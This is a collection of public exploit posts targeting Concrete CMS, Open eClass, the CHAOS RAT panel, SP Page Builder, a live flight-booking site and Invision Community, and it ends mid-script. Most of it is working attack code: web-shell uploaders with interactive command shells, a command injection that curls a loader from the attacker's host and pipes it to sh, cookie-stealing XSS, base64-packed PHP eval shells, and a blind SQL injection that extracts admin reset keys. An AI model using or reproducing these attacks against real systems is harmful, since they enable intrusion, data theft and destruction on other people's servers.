<pre><code># Exploit Title: Multiple Web Flaws in concretecmsv9.2.7<br /># Date: 4/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 9.2.7<br /># Tested on: Ubuntu 22.04<br /># Blog: http://msecureltd.blogspot.com<br /><br /><br />Verbose Error Message - Stack Trace:<br /><br />1. Directly browse to edit profile page<br />2. Error should come up with verbose stack trace<br /><br />Verbose Error Message - SQL Error:<br /><br />1. Page Settings > Design > Save Changes<br />2. Intercept HTTP POST request and place single quote to "pTemplateID"<br />3. Verbose SQL error message would occur<br /><br />Open Redirect:<br /><br />1. Login to application<br />2. Click to "Edit This Page" button<br />3. Intercept HTTP GET request<br />4. Enter relevant domain as value for "redirect" parameter<br /><br />Stored XSS:<br /><br />1. Edit page<br />2. Add HTML and drag it to the page<br />3. Add XSS payload<br /><br />"><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="><br /><br /></code></pre>
<pre><code>import requests<br />import argparse<br />import zipfile<br />import os<br />import sys<br /><br />RED = '\033[91m'<br />GREEN = '\033[92m'<br />YELLOW = '\033[93m'<br />RESET = '\033[0m'<br />ORANGE = '\033[38;5;208m'<br /><br />MALICIOUS_PAYLOAD = """\<br /><?php<br /><br />if(isset($_REQUEST['cmd'])){<br /> $cmd = ($_REQUEST['cmd']);<br /> system($cmd);<br /> die;<br />}<br /><br />?><br />"""<br /><br />def banner():<br /> print(f'''{RED}<br />{YELLOW}<br /> ============================ Author: Frey ============================<br />{RESET}''')<br /><br />def execute_command(openeclass, filename):<br /> while True:<br /> # Prompt for user input with "eclass"<br /> cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")<br /><br /> # Check if the command is 'quit', then break the loop<br /> if cmd.lower() == "quit":<br /> print(f"{ORANGE}\nExiting...{RESET}")<br /> clean_server(openeclass)<br /> sys.exit()<br /><br /> # Construct the URL with the user-provided command<br /> url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"<br /><br /> # Execute the GET request<br /> try:<br /> response = requests.get(url)<br /><br /> # Check if the request was successful<br /> if response.status_code == 200:<br /> # Print the response text<br /> print(f"{GREEN}{response.text}{RESET}")<br /><br /> except requests.exceptions.RequestException as e:<br /> # Print any error that occurs during the request<br /> print(f"{RED}An error occurred: {e}{RESET}")<br /><br />def upload_web_shell(openeclass, username, password):<br /> login_url = f'{openeclass}/?login_page=1'<br /> login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'<br /><br /> # Login credentials<br /> payload = {<br /> 'next': '/main/portfolio.php',<br /> 'uname': f'{username}',<br /> 'pass': f'{password}',<br /> 'submit': 'Enter'<br /> }<br /><br /> headers = {<br /> 'Referer': login_page_url,<br /> }<br /><br /> # Use a session to ensure cookies are handled correctly<br /> with requests.Session() as session:<br /> # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens<br /> session.get(login_page_url)<br /><br /> # Post the login credentials<br /> response = session.post(login_url, headers=headers, data=payload)<br /><br /> # Create a zip file containing the malicious payload<br /> zip_file_path = 'malicious_payload.zip'<br /> with zipfile.ZipFile(zip_file_path, 'w') as zipf:<br /> zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())<br /><br /> # Upload the zip file<br /> url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'<br /> files = {<br /> 'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'),<br /> 'certhtmlfile': (None, ''),<br /> 'orientation': (None, 'L'),<br /> 'description': (None, ''),<br /> 'cert_id': (None, ''),<br /> 'submit_cert_template': (None, '')<br /> }<br /> response = session.post(url, files=files)<br /><br /> # Clean up the zip file<br /> os.remove(zip_file_path)<br /><br /> # Check if the upload was successful<br /> if response.status_code == 200:<br /> print(f"{GREEN}Payload uploaded successfully!{RESET}")<br /> return True<br /> else:<br /> print(f"{RED}Failed to upload payload. Exiting...{RESET}")<br /> return False<br /><br />def clean_server(openeclass):<br /> print(f"{ORANGE}Cleaning server...{RESET}")<br /> # Remove the uploaded files<br /> requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")<br /> requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")<br /> print(f"{GREEN}Server cleaned successfully!{RESET}")<br /><br />def main():<br /> parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")<br /> parser.add_argument('-u', '--username', required=True, help="Username for login")<br /> parser.add_argument('-p', '--password', required=True, help="Password for login")<br /> parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")<br /> args = parser.parse_args()<br /><br /> banner()<br /> # Running the main login and execute command function<br /> if upload_web_shell(args.eclass, args.username, args.password):<br /> execute_command(args.eclass, 'evil.php')<br /><br />if __name__ == "__main__":<br /> main()<br /></code></pre>
<pre><code># Exploit Title: CHAOS RAT v5.0.1 RCE<br /># Date: 2024-04-05<br /># Exploit Author: @_chebuya<br /># Software Link: https://github.com/tiagorlampert/CHAOS<br /># Version: v5.0.1 <br /># Tested on: Ubuntu 20.04 LTS<br /># CVE: CVE-2024-30850, CVE-2024-31839<br /># Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server<br /># Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc<br /># Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/<br />import time<br />import requests<br />import threading<br />import json<br />import websocket<br />import http.client<br />import argparse<br />import sys<br />import re<br /><br />from functools import partial<br />from http.server import BaseHTTPRequestHandler, HTTPServer<br /><br />class Collector(BaseHTTPRequestHandler):<br /> def __init__(self, ip, port, target, command, video_name, *args, **kwargs):<br /> self.ip = ip<br /> self.port = port<br /> self.target = target<br /> self.shell_command = command<br /> self.video_name = video_name <br /> super().__init__(*args, **kwargs)<br /><br /> def do_GET(self):<br /> if self.path == "/loader.sh":<br /> self.send_response(200)<br /> self.end_headers()<br /> command = str.encode(self.shell_command)<br /> self.wfile.write(command)<br /> elif self.path == "/video.mp4":<br /> with open(self.video_name, 'rb') as f:<br /> self.send_response(200)<br /> self.send_header('Content-type', 'video/mp4')<br /> self.end_headers()<br /> self.wfile.write(f.read())<br /> else:<br /> cookie = self.path.split("=")[1]<br /> self.send_response(200)<br /> self.end_headers()<br /> self.wfile.write(b"")<br /><br /> background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port))<br /> background_thread.start()<br /><br />def convert_to_int_array(string):<br /> int_array = []<br /> for char in string:<br /> int_array.append(ord(char))<br /> return int_array<br /><br />def extract_client_info(path):<br /> with open(path, 'rb') as f:<br /> data = str(f.read())<br /><br /> address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}"<br /> address_pattern = re.compile(address_regexp)<br /> address = address_pattern.findall(data)[0].split("=")[1]<br /><br /> port_regexp = r"main\.Port=\d{1,6}"<br /> port_pattern = re.compile(port_regexp)<br /> port = port_pattern.findall(data)[0].split("=")[1]<br /><br /> jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*"<br /> jwt_pattern = re.compile(jwt_regexp)<br /> jwt = jwt_pattern.findall(data)[0].split("=")[1]<br /><br /> return f"{address}:{port}", jwt<br /><br />def keep_connection(target, cookie, hostname, username, os_name, mac, ip):<br /><br /> print("Spoofing agent connection")<br /> headers = {<br /> "Cookie": f"jwt={cookie}"<br /> }<br /><br /> while True:<br /> data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())}<br /> r = requests.get(f"http://{target}/health", headers=headers)<br /> r = requests.post(f"http://{target}/device", headers=headers, json=data)<br /> time.sleep(30)<br /><br />def handle_command(target, cookie, mac, ip, port):<br /> print("Waiting to serve malicious command outupt")<br /> headers = {<br /> "Cookie": f"jwt={cookie}",<br /> "X-Client": mac<br /> }<br /><br /> ws = websocket.WebSocket()<br /> ws.connect(f'ws://{target}/client', header=headers)<br /> while True:<br /> response = ws.recv()<br /><br /> command = json.loads(response)['command']<br /> data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False}<br /><br /> ws.send_binary(json.dumps(data))<br /><br /><br />def run_exploit(cookie, target, ip, port):<br /> print(f"Exploiting {target} with JWT {cookie}")<br /> conn = http.client.HTTPConnection(target)<br /> headers = {<br /> 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',<br /> 'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932',<br /> 'Cookie': f'jwt={cookie}'<br /> }<br /> conn.request(<br /> 'POST',<br /> '/generate',<br /> f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n',<br /> headers<br /> )<br /><br />def run(ip, port, target, command, video_name):<br /> server_address = (ip, int(port))<br /><br /> collector = partial(Collector, ip, port, target, command, video_name)<br /> httpd = HTTPServer(server_address, collector)<br /> print(f'Server running on port {ip}:{port}')<br /> httpd.serve_forever()<br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser()<br /> subparsers = parser.add_subparsers(dest="option")<br /><br /> exploit = subparsers.add_parser("exploit")<br /> exploit.add_argument("-f", "--file", help="The path to the CHAOS client")<br /> exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)")<br /> exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;")<br /> exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4")<br /> exploit.add_argument("-j", "--jwt", help="The JWT token to use")<br /> exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True)<br /> exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000)<br /> exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01")<br /> exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator")<br /> exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows")<br /> exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56")<br /> exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12")<br /><br /> extract = subparsers.add_parser("extract")<br /> extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True)<br /><br /> args = parser.parse_args()<br /><br /> if args.option == "exploit":<br /> if args.target != None and args.jwt != None:<br /> target = args.target<br /> jwt = args.jwt<br /> elif args.file != None:<br /> target, jwt = extract_client_info(args.file)<br /> else:<br /> exploit.print_help(sys.stderr)<br /> sys.exit(1)<br /><br /> bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip))<br /> bg.start()<br /><br /> cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port))<br /> cmd.start()<br /><br /> server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name))<br /> server.start()<br /><br /> elif args.option == "extract":<br /> target, jwt = extract_client_info(args.file)<br /> print(f"CHAOS server: {target}\nJWT: {jwt}")<br /> else:<br /> parser.print_help(sys.stderr)<br /> sys.exit(1)<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : SP Page Builder 5.2.7 Sql injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |<br />| # Vendor : https://extensions.joomla.org/extension/sp-page-builder/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251 <===== inject here<br /><br />[+] http://127.0.0.1/cdgi36fr/index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251<br /><br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code><br />This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89".<br />We have repeatedly reported to this site that it has a security problem and has ignored our report.<br />We want to record this security issue<br /> <br />#########################################################################################################################<br /># #<br /># Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability #<br /># #<br /># Author : E1.Coders #<br /># #<br /># Contact : E1.Coders [at] Mail [dot] RU #<br /># #<br /># Portal Link : https://flightio.com/ #<br /># #<br /># Security Risk : Medium #<br /># #<br /># Description : All target's IRanian AIRPOT websites #<br /># #<br /># DorK : "inurl:wp-comments-post.php%5Eauthor=" #<br /># #<br />#########################################################################################################################<br /># #<br /># Expl0iTs: #<br />#<br /># vuln type : SQLInjection<br /># <br /># refer address : https://flightio.com/blog/attractions/best-chahbahar-attractions/<br /># <br /># request type : POST<br /># <br /># action url : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0<br /># <br /># parameter : comment_parent<br /># <br /># description : POST SQL INJECTION BooleanBased String<br /># <br /># POC : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199<br />---------------------------------------<br />#<br /># Expl0iTs: <br /># vuln type : SQLInjection<br /># <br /># refer address : https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/<br /># <br /># request type : POST<br /># <br /># action url : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319<br /># <br /># parameter : ak_hp_textarea<br /># <br /># description : POST SQL INJECTION BooleanBased String<br /># <br /># POC : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199<br />------------------------------------------------<br /># # Expl0iTs: <br /># vuln type : SQLInjection<br /># <br /># refer address : https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/<br /># <br /># request type : POST<br /># <br /># action url : https://flightio.com/blog/wp-comments-post.php^submit=ارسال دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999<br /># <br /># parameter : author<br /># <br /># description : POST SQL INJECTION BooleanBased String<br /># <br /># POC : https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199 #<br />#########################################################################################################################<br /># #<br /># | Security Is JOCK | #<br /># #<br /># | Russian Black Hat | #<br /># #<br />#########################################################################################################################<br /> <br /> <br />Exploit PHP :<br /> <br />global $wpdb;<br /> <br />$author = '99999999';<br />$comment = 'WCRTEXTAREATESTINPUT9752286';<br />$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116';<br /> <br />$wpdb->prepare(<br /> "INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",<br /> $comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author<br />);<br /> <br />$wpdb->insert('wp_comments', array(<br /> 'comment_post_ID' => $comment_post_ID,<br /> 'comment_author' => $comment_author,<br /> 'comment_content' => $comment_content,<br /> 'comment_parent' => $comment_parent,<br /> 'akismet_comment_nonce' => $akismet_comment_nonce,<br /> 'ak_js' => $ak_js,<br /> 'author' => $author<br />));<br /></code></pre>
<pre><code>------------------------------------------------------------------------------<br />Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability<br />------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://invisioncommunity.com<br /><br /><br />[-] Affected Versions:<br /><br />Version 4.7.16 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the<br />/applications/core/modules/admin/editor/toolbar.php script.<br />Specifically, into the<br />IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will<br />handle<br />the upload of a ZIP file, trying to extract its content into the<br />/applications/core/interface/ckeditor/ckeditor/plugins/ directory; if<br />the ZIP archive does not include<br />a plugin.js file, then the extracted ZIP content will be recursively<br />deleted from the file system,<br />otherwise it will stay there. This can be exploited to execute<br />arbitrary PHP code by uploading a<br />ZIP archive containing a plugin.js file (which can also be empty)<br />along with a PHP file. Successful<br />exploitation of this vulnerability requires an Administrator account<br />having the "toolbar_manage" permission.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2024-30162.php<br /><br /><br />[-] Solution:<br /><br />No official solution is currently available.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed<br />[20/03/2024] - CVE identifier requested<br />[24/03/2024] - CVE identifier assigned<br />[05/04/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2024-30162 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-03<br /><br /><br />-----------------------<br />PoC:<br /><br /><?php<br /><br />/*<br /> ------------------------------------------------------------------------------<br /> Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability<br /> ------------------------------------------------------------------------------<br /><br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://invisioncommunity.com<br /><br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will be not responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /><br /> [-] Vulnerability Description:<br /><br /> The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.<br /> Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will<br /> handle the upload of a ZIP file, trying to extract its content into the<br /> /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does<br /> not include a plugin.js file, then the extracted ZIP content will be recursively deleted<br /> from the file system, otherwise it will stay there. This can be exploited to execute<br /> arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can<br /> also be empty) along with a PHP file. Successful exploitation of this vulnerability<br /> requires an Administrator account having the "toolbar_manage" permission.<br /><br /> [-] Original Advisory:<br /><br /> https://karmainsecurity.com/KIS-2024-03<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[-] cURL extension required!\n");<br /><br />if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");<br /><br />$url = $argv[1];<br />$email = $argv[2];<br />$passwd = $argv[3];<br />$ch = curl_init();<br /><br />@unlink('./cookies.txt');<br /><br />curl_setopt($ch, CURLOPT_HEADER, true);<br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');<br />curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');<br /><br />print "[+] Logging into AdminCP\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");<br />curl_setopt($ch, CURLOPT_POST, false);<br /><br />if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");<br /><br />if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");<br /><br />print "[+] Uploading malicious ZIP file\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");<br />curl_setopt($ch, CURLOPT_POST, false);<br /><br />if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");<br /><br />$plg = md5(time()).".zip";<br /><br />@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));<br /><br />$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];<br /><br />curl_setopt($ch, CURLOPT_POSTFIELDS, $params);<br /><br />if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");<br /><br />print "[+] Launching shell\n";<br /><br />curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");<br />curl_setopt($ch, CURLOPT_POST, false);<br /><br />$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";<br /><br />while(1)<br />{<br /> print "\ninvision-shell# ";<br /> if (($cmd = trim(fgets(STDIN))) == "exit") break;<br /> curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);<br /> preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");<br />}<br /><br /></code></pre>
<pre><code>--------------------------------------------------------------------<br />Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability<br />--------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://invisioncommunity.com<br /><br /><br />[-] Affected Versions:<br /><br />All versions from 4.4.0 to 4.7.15.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the<br />/applications/nexus/modules/front/store/store.php script.<br />Specifically, into the<br />IPS\nexus\modules\front\store\_store::_categoryView() method:<br /><br />126 /* Apply Filters */<br />127 if ( isset( \IPS\Request::i()->filter ) and \is_array(<br />\IPS\Request::i()->filter ) )<br />128 {<br />129 $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter );<br />130 foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues )<br />131 {<br />132 $where[] = array( \IPS\Db::i()->findInSet(<br />"filter{$filterId}.pfm_values", array_map( 'intval', explode( ',',<br />$allowedValues ) ) ) );<br />133 $joins[] = array( 'table' => array( 'nexus_package_filters_map',<br />"filter{$filterId}" ), 'on' => array(<br />"filter{$filterId}.pfm_package=p_id AND<br />filter{$filterId}.pfm_filter=?", $filterId ) );<br />134 }<br />135 }<br /><br />User input passed through the "filter" request parameter is not<br />properly sanitized before being<br />assigned to the $where and $joins variables (lines 132 and 133), which<br />are later used to execute<br />some SQL queries. This can be exploited by unauthenticated attackers<br />to carry out time-based or<br />error-based Blind SQL Injection attacks. Subsequently, this might also<br />be exploited to reset<br />users' passwords and gain unauthorized access to the AdminCP, in order<br />to achieve<br />Remote Code Execution (RCE). Successful exploitation of this<br />vulnerability requires<br />the nexus application to be installed and configured with one "Product<br />Group" at least.<br /><br /><br />[-] Proof of Concept:<br /><br />https://karmainsecurity.com/pocs/CVE-2024-30163.php<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 4.7.16 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure<br />[12/03/2024] - Version 4.7.16 released<br />[20/03/2024] - CVE identifier requested<br />[24/03/2024] - CVE identifier assigned<br />[05/04/2024] - Coordinated public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2024-30163 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Other References:<br /><br />https://invisioncommunity.com/release-notes/4716-r128/<br />https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2024-02<br /><br /><br />-----------------------<br />PoC:<br /><br /><?php<br /><br />/*<br /> --------------------------------------------------------------------<br /> Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability<br /> --------------------------------------------------------------------<br /><br /> author..............: Egidio Romano aka EgiX<br /> mail................: n0b0d13s[at]gmail[dot]com<br /> software link.......: https://invisioncommunity.com<br /><br /> +-------------------------------------------------------------------------+<br /> | This proof of concept code was written for educational purpose only. |<br /> | Use it at your own risk. Author will be not responsible for any damage. |<br /> +-------------------------------------------------------------------------+<br /><br /> [-] Vulnerability Description:<br /><br /> The vulnerability is located in the /applications/nexus/modules/front/store/store.php script.<br /> Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: user<br /> input passed through the "filter" request parameter is not properly sanitized before being<br /> assigned to the $where and $joins variables, which are later used to execute some SQL<br /> queries. This can be exploited by unauthenticated attackers to carry out time-based<br /> or error-based SQL Injection attacks.<br /><br /> [-] Original Advisory:<br /><br /> https://karmainsecurity.com/KIS-2024-02<br />*/<br /><br />set_time_limit(0);<br />error_reporting(E_ERROR);<br /><br />if (!extension_loaded("curl")) die("[-] cURL extension required!\n");<br /><br />if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");<br /><br />$url = $argv[1];<br />$ch = curl_init();<br />$sec = 3; // number of seconds for SLEEP(): less seconds, less accurate<br /><br />curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br />curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);<br />curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/");<br /><br />function sql_injection($sql)<br />{<br /> global $ch, $sec;<br /><br /> $min = true;<br /> $idx = 1;<br /><br /> while(1)<br /> {<br /> $test = 256;<br /><br /> for ($i = 7; $i >= 0; $i--)<br /> {<br /> $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));<br /> $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#";<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection)));<br /> $start = time(); curl_exec($ch); $secs = time() - $start;<br /> $min = ($secs < $sec);<br /> }<br /><br /> if (($chr = $min ? ($test - 1) : ($test)) == 0) break;<br /> $data .= chr($chr); $min = true; $idx++;<br /> print "\r[*] Data: {$data}";<br /> }<br /><br /> return $data;<br />}<br /><br />print "[+] Step 1: fetching admin's e-mail address\n";<br /><br />$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");<br /><br />print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";<br /><br />fgets(STDIN);<br /><br />print "[+] Step 3: fetching the password reset key\n";<br /><br />$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");<br /><br />print "\n[+] Step 